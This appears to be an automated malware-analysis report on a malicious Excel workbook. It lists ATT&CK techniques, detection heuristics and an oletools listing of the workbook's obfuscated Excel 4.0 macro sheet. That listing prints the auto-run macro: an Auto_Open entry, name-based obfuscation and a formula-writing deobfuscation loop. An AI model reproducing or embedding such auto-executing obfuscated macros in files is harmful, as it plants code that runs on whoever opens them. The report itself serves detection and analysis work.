Verdict: MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically an Auto_Open defined name, which is a critical finding indicating potential malicious execution. The presence of dangerous formula APIs like RUN further supports this. The macro sheet is likely designed to execute a payload upon opening, leveraging the Auto_Open functionality for initial execution.
Heuristics (3)
- Excel 4.0 Auto_Open defined name [critical, OLE_XLM_AUTOOPEN_DEFINEDNAME]: oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs [critical, OLE_XLM_DANGEROUS_FN]: the Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present [medium, OLE_XLM_AUTOOPEN]: the workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6414 bytes |

SHA-256: 9eb47aa07cd8b3951478134326be2e87030f30f5932eddd0b442f0d427976b06
Preview script: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - SZW
' 0018 20 LABEL : Cell Value, String Constant - AMkZH len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!C186
' 0018 20 LABEL : Cell Value, String Constant - cdPxo len=0
' 0018 24 LABEL : Cell Value, String Constant - cpjfppJMU len=0
' 0018 20 LABEL : Cell Value, String Constant - HuicZ len=0
' 0018 23 LABEL : Cell Value, String Constant - KcWCTNQH len=0
' 0018 26 LABEL : Cell Value, String Constant - LBttNYhgMTm len=0
' 0018 22 LABEL : Cell Value, String Constant - Mslbrce len=0
' 0018 27 LABEL : Cell Value, String Constant - MYFAJXIdTbFt len=0
' 0018 27 LABEL : Cell Value, String Constant - NBkAaBOzwQTr len=0
' 0018 22 LABEL : Cell Value, String Constant - NXphrFs len=0
' 0018 23 LABEL : Cell Value, String Constant - PBaRWpRQ len=0
' 0018 27 LABEL : Cell Value, String Constant - pCUbucibfrEN len=0
' 0018 23 LABEL : Cell Value, String Constant - qyRnKusj len=0
' 0018 26 LABEL : Cell Value, String Constant - RhKyXZPOOki len=0
' 0018 23 LABEL : Cell Value, String Constant - TBoUVFDw len=0
' 0018 23 LABEL : Cell Value, String Constant - xiOoyePn len=0
' 0018 27 LABEL : Cell Value, String Constant - YIAUuESTwCkT len=0
' 0018 24 LABEL : Cell Value, String Constant - YNAogLqBY len=0
' 0018 22 LABEL : Cell Value, String Constant - ZEnVOht len=0
' 0018 27 LABEL : Cell Value, String Constant - ZywdyOvnBMkk len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' SZW,C95,"SET.NAME("ZywdyOvnBMkk",VALUE("0"))",""
' SZW,C97,"SET.NAME("YIAUuESTwCkT",ZywdyOvnBMkk)",""
' SZW,C102,"SET.NAME("HuicZ",ZywdyOvnBMkk)",""
' SZW,C104,"SET.NAME("qyRnKusj",COUNTA(LBttNYhgMTm))",""
' SZW,C109,"SET.NAME("pCUbucibfrEN",COUNTA(NXphrFs))",""
' SZW,C113,[],""
' SZW,C117,"SET.NAME("cpjfppJMU","")",""
' SZW,C119,"YIAUuESTwCkT",""
' SZW,C122,"SET.NAME("xiOoyePn",HLOOKUP("*",LBttNYhgMTm,YIAUuESTwCkT,FALSE))",""
' SZW,C126,"TBoUVFDw",""
' SZW,C131,"SET.NAME("MYFAJXIdTbFt",ZywdyOvnBMkk)",""
' SZW,C134,[],""
' SZW,C136,"MYFAJXIdTbFt",""
' SZW,C139,"YNAogLqBY",""
' SZW,C144,"KcWCTNQH",""
' SZW,C149,"PBaRWpRQ",""
' SZW,C154,"SET.NAME("AMkZH",VALUE(HLOOKUP("*",NXphrFs,PBaRWpRQ,FALSE)))",""
' SZW,C159,"ZEnVOht",""
' SZW,C162,"cpjfppJMU",""
' SZW,C164,"HuicZ",""
' SZW,C169,NEXT(),""
' SZW,C171,"RhKyXZPOOki",""
' SZW,C175,"SET.NAME("f",INT(T(FORMULA(T(cpjfppJMU)&"",""&T(RhKyXZPOOki)))))",""
' SZW,C179,"NBkAaBOzwQTr",""
' SZW,C181,NEXT(),""
' SZW,C184,RETURN(),""
' SZW,C212,"SET.NAME("cdPxo",C95)",""
' SZW,C217,"LBttNYhgMTm",""
' SZW,C219,"SET.NAME("NXphrFs",R55C14)",""
' SZW,C224,"SET.NAME("NBkAaBOzwQTr",235)",""
' SZW,C229,"SET.NAME("Mslbrce",3)",""
' SZW,C234,cdPxo(),""
' SZW,C235,HALT(),""